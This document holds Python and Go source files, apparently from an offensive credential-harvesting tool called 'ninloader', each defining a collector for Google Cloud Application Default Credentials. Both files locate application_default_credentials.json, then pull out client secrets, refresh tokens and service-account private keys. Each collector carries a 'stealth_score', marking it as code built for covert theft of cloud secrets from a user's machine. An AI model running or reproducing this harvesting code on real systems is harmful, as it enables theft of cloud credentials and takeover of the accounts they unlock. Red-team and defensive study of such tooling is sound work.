File: ninloader/python/ninloader/collectors/google/adc.py
"""Google Application Default Credentials collector — reads application_default_credentials.json."""

from __future__ import annotations

import json
from typing import List

from ..base import BaseCollector
from .. import CollectorRegistry
from ...types import CollectedToken, DiscoveredToken
from ...secure import secure
from ...platform_utils import gcloud_dir


@CollectorRegistry.register
class GoogleAdcCollector(BaseCollector):
    service = "google"
    source = "adc"
    stealth_score = 5

    def _adc_path(self):
        return gcloud_dir() / "application_default_credentials.json"

    def discover(self) -> List[DiscoveredToken]:
        path = self._adc_path()
        if not path.exists():
            return []

        try:
            data = json.loads(path.read_text())
            cred_type = data.get("type", "unknown")
            client_id = data.get("client_id", "")
            has_refresh = bool(data.get("refresh_token"))

            details = f"type={cred_type}"
            if has_refresh:
                details += ", has_refresh_token"

            return [DiscoveredToken(
                service=self.service,
                source=self.source,
                path=str(path),
                account_hint=client_id[:20] + "..." if len(client_id) > 20 else client_id,
                stealth_score=self.stealth_score,
                details=details,
            )]
        except Exception as e:
            self._warn(f"Failed to parse {path}: {e}")
            return []

    def collect(self) -> List[CollectedToken]:
        path = self._adc_path()
        if not path.exists():
            return []

        try:
            data = json.loads(path.read_text())
            cred_type = data.get("type")

            if cred_type == "authorized_user":
                return [CollectedToken(
                    service=self.service,
                    source=self.source,
                    stealth_score=self.stealth_score,
                    client_id=data.get("client_id"),
                    client_secret=secure(data.get("client_secret", "")),
                    refresh_token=secure(data.get("refresh_token", "")),
                    token_uri="https://oauth2.googleapis.com/token",
                    extra={"type": cred_type, "quota_project_id": data.get("quota_project_id")},
                )]
            elif cred_type == "service_account":
                return [CollectedToken(
                    service=self.service,
                    source=self.source,
                    stealth_score=self.stealth_score,
                    account_id=data.get("client_id"),
                    username=data.get("client_email"),
                    client_id=data.get("client_id"),
                    client_secret=secure(data.get("private_key", "")),
                    token_uri=data.get("token_uri", "https://oauth2.googleapis.com/token"),
                    extra={
                        "type": cred_type,
                        "project_id": data.get("project_id"),
                        "private_key_id": data.get("private_key_id"),
                    },
                )]
            else:
                self._warn(f"Unknown ADC type: {cred_type}")
                return []

        except Exception as e:
            self._warn(f"Failed to collect from {path}: {e}")
            return []

File: ninloader/go/collectors/google/adc.go
package google

import (
	"encoding/json"
	"fmt"
	"os"
	"path/filepath"

	"github.com/ninken/ninloader-go/internal/collector"
	"github.com/ninken/ninloader-go/internal/platform"
	"github.com/ninken/ninloader-go/internal/registry"
	"github.com/ninken/ninloader-go/internal/types"
)

// ADCCollector reads Google Application Default Credentials from
// application_default_credentials.json in the gcloud config directory.
type ADCCollector struct {
	collector.BaseCollector
}

func init() {
	registry.Register("google", "adc", func() collector.Collector {
		return &ADCCollector{BaseCollector: collector.BaseCollector{Svc: "google", Src: "adc"}}
	})
}

func (c *ADCCollector) Service() string      { return c.Svc }
func (c *ADCCollector) Source() string        { return c.Src }
func (c *ADCCollector) StealthScore() int     { return 5 }
func (c *ADCCollector) Platforms() []string   { return nil } // all platforms
func (c *ADCCollector) IsPlatformSupported() bool { return true }

func (c *ADCCollector) adcPath() string {
	return filepath.Join(platform.GcloudDir(), "application_default_credentials.json")
}

// Discover checks whether the ADC file exists and returns a discovery hint.
func (c *ADCCollector) Discover() []*types.DiscoveredToken {
	path := c.adcPath()
	raw, err := os.ReadFile(path)
	if err != nil {
		return nil
	}

	var data map[string]any
	if err := json.Unmarshal(raw, &data); err != nil {
		c.Warn(fmt.Sprintf("Failed to parse %s: %v", path, err))
		return nil
	}

	credType, _ := data["type"].(string)
	if credType == "" {
		credType = "unknown"
	}
	clientID, _ := data["client_id"].(string)
	_, hasRefresh := data["refresh_token"]

	details := fmt.Sprintf("type=%s", credType)
	if hasRefresh {
		details += ", has_refresh_token"
	}

	accountHint := clientID
	if len(accountHint) > 20 {
		accountHint = accountHint[:20] + "..."
	}

	return []*types.DiscoveredToken{{
		Service:      c.Svc,
		Source:       c.Src,
		Path:         path,
		AccountHint:  accountHint,
		StealthScore: 5,
		Details:      details,
	}}
}

// Collect reads and parses the ADC file, returning collected tokens for
// authorized_user or service_account credential types.
func (c *ADCCollector) Collect() []*types.CollectedToken {
	path := c.adcPath()
	raw, err := os.ReadFile(path)
	if err != nil {
		return nil
	}

	var data map[string]any
	if err := json.Unmarshal(raw, &data); err != nil {
		c.Warn(fmt.Sprintf("Failed to collect from %s: %v", path, err))
		return nil
	}

	credType, _ := data["type"].(string)

	switch credType {
	case "authorized_user":
		return c.collectAuthorizedUser(data)
	case "service_account":
		return c.collectServiceAccount(data)
	default:
		c.Warn(fmt.Sprintf("Unknown ADC type: %s", credType))
		return nil
	}
}

func (c *ADCCollector) collectAuthorizedUser(data map[string]any) []*types.CollectedToken {
	clientID, _ := data["client_id"].(string)
	clientSecret, _ := data["client_secret"].(string)
	refreshToken, _ := data["refresh_token"].(string)
	quotaProjectID, _ := data["quota_project_id"].(string)

	tok := types.NewCollectedToken(c.Svc, c.Src, 5)
	tok.ClientID = clientID
	tok.ClientSecret = types.Secure(clientSecret)
	tok.RefreshToken = types.Secure(refreshToken)
	tok.TokenURI = "https://oauth2.googleapis.com/token"
	tok.Extra["type"] = "authorized_user"
	tok.Extra["quota_project_id"] = quotaProjectID

	return []*types.CollectedToken{tok}
}

func (c *ADCCollector) collectServiceAccount(data map[string]any) []*types.CollectedToken {
	clientID, _ := data["client_id"].(string)
	clientEmail, _ := data["client_email"].(string)
	privateKey, _ := data["private_key"].(string)
	projectID, _ := data["project_id"].(string)
	privateKeyID, _ := data["private_key_id"].(string)
	tokenURI, _ := data["token_uri"].(string)
	if tokenURI == "" {
		tokenURI = "https://oauth2.googleapis.com/token"
	}

	tok := types.NewCollectedToken(c.Svc, c.Src, 5)
	tok.AccountID = clientID
	tok.Username = clientEmail
	tok.ClientID = clientID
	tok.ClientSecret = types.Secure(privateKey)
	tok.TokenURI = tokenURI
	tok.Extra["type"] = "service_account"
	tok.Extra["project_id"] = projectID
	tok.Extra["private_key_id"] = privateKeyID

	return []*types.CollectedToken{tok}
}
